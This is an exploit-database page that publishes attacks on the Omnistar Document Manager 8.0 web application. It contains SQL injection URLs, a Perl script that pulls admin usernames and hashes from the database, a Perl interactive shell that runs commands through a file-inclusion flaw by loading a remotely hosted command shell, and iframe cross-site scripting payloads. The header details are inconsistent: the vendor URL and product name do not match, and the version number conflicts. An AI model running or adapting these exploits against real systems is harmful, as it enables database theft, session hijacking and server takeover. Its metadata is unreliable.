[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Omnistar Drive Management System 8.0 Multiple Vulnerability

Author
L0rd CrusAd3r
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-13401
Category
web applications
Date add
20-07-2010
Platform
php
=======================================================
Omnistar Drive Management System Multiple Vulnerability
=======================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                ###########################################           1
0                I'm L0rd CrusAd3r member from Inj3ct0r Team           1
1                ###########################################           0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title:Omnistar Drive Management System Multiple Vulnerability
Vendor url:http://tcwphpalbum.sourceforge.net/
Version:9.2
Cost:187$
Published: 2010-07-19
Greetz to:r0073r (inj3ct0r.com), Sid3^effects, MaYur, MA1201, Sonic Bluehat, Sai, KD, M4n0j.
Special Greetz: Topsecure.net, inj3ct0r Team ,Andhrahackers.com
Shoutzz:- To all ICW members.
~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~
Description:

If you are looking to upload unlimited files and documents and manage them from anywhere in the world using just a web browser then Omnistar's document management system is the software for you. Omnistar document management system is very easy to use. Code: PHP 4.0

~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~

Details:
========
1.1
Multiple SQL Injection Vulnerabilities are detected in Omnistardrives Omnistar Document Manager v8.0 web application.
The sql injection vulnerability allows an remote attacker to inject own sql commands/statements on the affected application dbms.
The vulnerabilities are detected in the user portal and admin section of the application. The sql vulnerabilities can be exploitation 
by remote attackers without privileged application user or admin account. The sql bugs are located index.php file with the bound 
vulnerable report_id, delete_id, add_id, return_to, interface, page & sort_order parameter requests. Successful exploitation of the 
vulnerabilities results in application dbms compromise & dbms manipulation via sql injection.

Vulnerable Section(s):
      [+] /user
      [+] /admin

Vulnerable Module(s):
      [+] index.php

Vulnerable Parameter(s):
      [+] report&id=
      [+] sort_order
      [+] delete&id=
      [+] page=
      [+] interface=


1.2
A local file include vulnerability is detected in Omnistardrives Omnistar Document Manager v8.0 web application.
The vulnerability allows a local privileged user account to include and load local system files. The vulnerability 
is located in the index module with the bound vulnerable area parameter request. Successful exploitation of the 
vulnerability results in a web server compromise via file load or information disclosure via local system file include.


Vulnerable Section(s):
      [+] /user
      [+] /admin

Vulnerable Module(s):
      [+] index.php
      [+] class.inc.php

Vulnerable Parameter(s):
      [+] area=



1.3
Multiple non persistent cross site scripting vulnerabilities are detected in Omnistardrives Omnistar Document Manager v8.0 web application.
The vulnerabilities allow remote attackers to hijack administrator/moderator/customer sessions via persistent malicious script code inject 
on application side. The vulnerabilities are located in the interface exception-handling module of the application with the client side 
bound vulnerable interface, act, name & alert_msg parameter requests.


Vulnerable Section(s):
      [+] /user
      [+] /admin

Vulnerable Module(s):
      [+] index.php

Vulnerable Parameter(s):
      [+] interface
      [+] act
      [+] name
      [+] alert_msg


Proof of Concept:
=================
1.1
The sql injection vulnerabilities can be exploited by remote attackers without required user inter action and without privileged application 
user account. For demonstration or reproduce ...

https://127.0.0.1:1338/[PATH]/index.php
?area=main&interface=users&sort_by=1&sort_order=ASC&page=1&return_to=@list&act=report&id=-1' union all select 1,2,3,4,()database,6--

https:/127.0.0.1:1338/[PATH]/index.php
?area=main&interface=users&sort_by=1&sort_order=ASC&page=-1%27&return_to=@list&act=list&sort_by=first_name&sort_order=-1' union all select 1,2,3,4,()database,6--

https://127.0.0.1:1338/[PATH]/index.php
?area=main&interface=users&sort_by=1&sort_order=ASC&page=1&return_to=@list&act=delete&id=-1' union all select 1,2,3,4,()database,6--

https://127.0.0.1:1338/[PATH]/index.php
?area=main&interface=users&sort_by=1&sort_order=ASC&page=1&return_to=@list&act=delete&id=-1' union all select 1,2,3,4,()database,6--

https://127.0.0.1:1338/[PATH]/index.php
?interface=-1' union all select 1,2,3,4,()database,6--&alert_msg=1337

https://127.0.0.1:1338/[PATH]/index.php
?area=main&interface=recycle_bin&act=list&sort_by=1&sort_order=ASC&page=-1' union all select 1,2,3,4,()database,6--
&return_to=-1' union all select 1,2,3,4,()database,6--


#!/usr/bin/perl

use IO::Socket;
if(@ARGV < 1){
print "
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
>  Remote SQL-Injection Exploit - Omnistar Document Manager v8.0
>  ---
>  $file ... can also be exchanged with the following parameters ---
>  $file2 = "/[INCLUDE PATH]/index.php?area=main&interface=users&sort_by=1&sort_order=ASC&page=1&return_to=@list&act=delete&id=";
>  $file3 = "/[INCLUDE PATH]/index.php?area=main&interface=users&sort_by=1&sort_order=ASC&page=-1%27&return_to=@list&act=list&sort_by=first_name&sort_order=";
>  $file4 = "/[INCLUDE PATH]/index.php?area=main&interface=users&sort_by=1&sort_order=ASC&page=1&return_to=@list&act=report&id=";
>  $file5 = "/[INCLUDE PATH]/index.php?area=main&interface=recycle_bin&act=list&sort_by=1&sort_order=ASC&page=";
>  ---
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
";
exit();
}
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$file = "/[INCLUDE PATH]/index.php?interface=";

print "Script <DIR> : ";
$dir = <STDIN>;
chop ($dir);

if ($dir =~ /exit/){
print "[+] Exploit Failed\n";
exit();
}

if ($dir =~ /\//){}
else {
print "[+] Exploit Failed\n";
exit();
 }

print "User <ID>    : ";
$ID = <STDIN>;
chop ($ID);

if ($ID =~ /exit/){
print "[+] Exploit Failed\n";
exit();
}

$len=length($ID);

if ($len == 1){}
else {
print "[+] Exploit Failed\n";
exit();
 }

$target = "-1+union+all+select+1,2,3,4,concat(X,0x3a,X,0x3a,X),6,7,+from+user+limit+1,1/*".$ID;
$target = $host.$dir.$file.$target;

print "[+] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n";
print "[+] Verbinden zu ... [> : $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "[+] Verbindungsaufbau fehlgeschlagen...!\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "[+] Connected!...\n";
while($answer = <$socket>) {
if ($answer =~ /color=\"#FF0000\">(.*?)<\/font>/){
print "[+] Exploiting the System! Grab Admin-HASH\n";
print "[+] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n";
print "[+] Clear Username: $1\n";
}

if ($answer =~ /Syntax error/) { 
print "+ Exploit Failed : ( \n";
print "[+] SYNTAX ERROR! Request: bkm@vulnerability-lab.com";
exit(); 
}

if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : (  \n";
print "[+] INTERNEL ERROR! Check out your Ressources";
exit(); 
}
break;
}
close($sock);


1.2
The local file include vulnerability can be exploited by local low privileged user account without required user inter action.
For demonstration or reproduce ...

https://127.0.0.1:1338/[PATH]/index.php?area=../../[LOCAL FILE INCLUDE VULNERABILITY!]/&..
https://127.0.0.1:1338/[PATH]/index.php?area=http://[LOCAL FILE INCLUDE VULNERABILITY!]&..

#!/usr/bin/perl

use LWP::UserAgent;

$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];

if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}

head();

while()
{
     print "[shell] \$";
while(<STDIN>)
     {
   $cmd=$_;
   chomp($cmd);

$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$Path.'[INCLUDE PATH HERE!]/index.php?area='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";

$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[\n]/[....]/;

if (!$cmd) {print "\nBitte geben sie ein Kommando ein\n\n"; $return ="";}

elsif ($return =~/Stream öffnen fehlgeschlagen: HTTP Request fehlgeschlagen/ || $return =~/: Kommando Zeile Angeben! <b>/)
     {print "\nKann keine Verbindung zum CMD HOST aufbauen oder Ungültige Kommando Variable\n";exit}
elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nUngültiges Kommando oder Kein Eingabe\n\n"}

if($return =~ /(.*)/)

{
     $finreturn = $1;
     $finreturn=~ tr/[....]/[\n]/;
     print "\r\n$finreturn\n\r";
     last;
}

else {print "[shell] \$";}}}last;

sub head()
 {
 print "\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n";
 print " >> Local File Include Vulnerability - Omnistar Document Manager v8.0 (?area=) \r\n";
 print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n";
 }
sub usage()
 {
 head();
 print " Usage: exploitname.pl [TARGET] [CMD SHELL location] [CMD SHELL Variable]\r \n\n";
 print " <Seite> [Full Path]  [http://www.webseite.com/]           \r\n";
 print " <CMD SHELL> <Path to CMD Shell> <http://www.seite.com/cmdfile.txt>       \r\n";
 print " <CMD VARIABLE> - Command variable - PHP SHELL             \r\n";
 exit();
 }


1.3
The client side cross site scripting vulnerabilities can be exploited by remote attackers without required application user account and with 
low or medium user inter action by an administrator/moderator/customer. For demonstration or reproduce ...

<html>
<head><body>
<title>Omnistar Document Manager v8.x - Client Side Cross Site Scripting PoC</title>
<iframe src=https://127.0.0.1:1338/[PATH]/index.php?interface=folder_groups-%3E%22%3Ciframe%20src=http://vulnerability-lab.com%3E>
<iframe src=https://127.0.0.1:1338/[PATH]/index.php?area=main&interface=backup_restore-%3E%22%3Ciframe%20src=http://vulnerability-lab.com%3E>
<iframe src=https://127.0.0.1:1338/[PATH]/index.php?interface=custom&act=user_fields-%3E%22%3Ciframe%20src=http://vulnerability-lab.com%3E>
<iframe src=https://127.0.0.1:1338/[PATH]/index.php?area=main&interface=anonymous_review&act=anonymous_root-%3E%22%3Ciframe%20src=http://vulnerability-lab.com%3E>
<iframe src=https://127.0.0.1:1338/[PATH]/index.php?interface=[SQL]&alert_msg=-%3E%22%3Ciframe%20src=http://vulnerability-lab.com%3E>
<iframe src=https://127.0.0.1:1338/[PATH]/index.php?area=main&interface=documents&sort_by=1&sort_order=ASC&page=1&return_to=@list&act=x&category=-%3E%22%3Ciframe%20src=http://vulnerability-lab.com%3E>
</body></head>
</html>


Risk:
=====
1.1
The security risk of the remote sql injection vulnerabilities are estimated as critical.

1.2
The security risk of the local file include vulnerability is etimated as high(-).

1.3
The security risk of the client side cross site scripting vulnerabilities are estimated as low(+)|(-)medium.


# 0day n0 m0re #
# L0rd CrusAd3r #



#  0day.today [2024-07-02]  #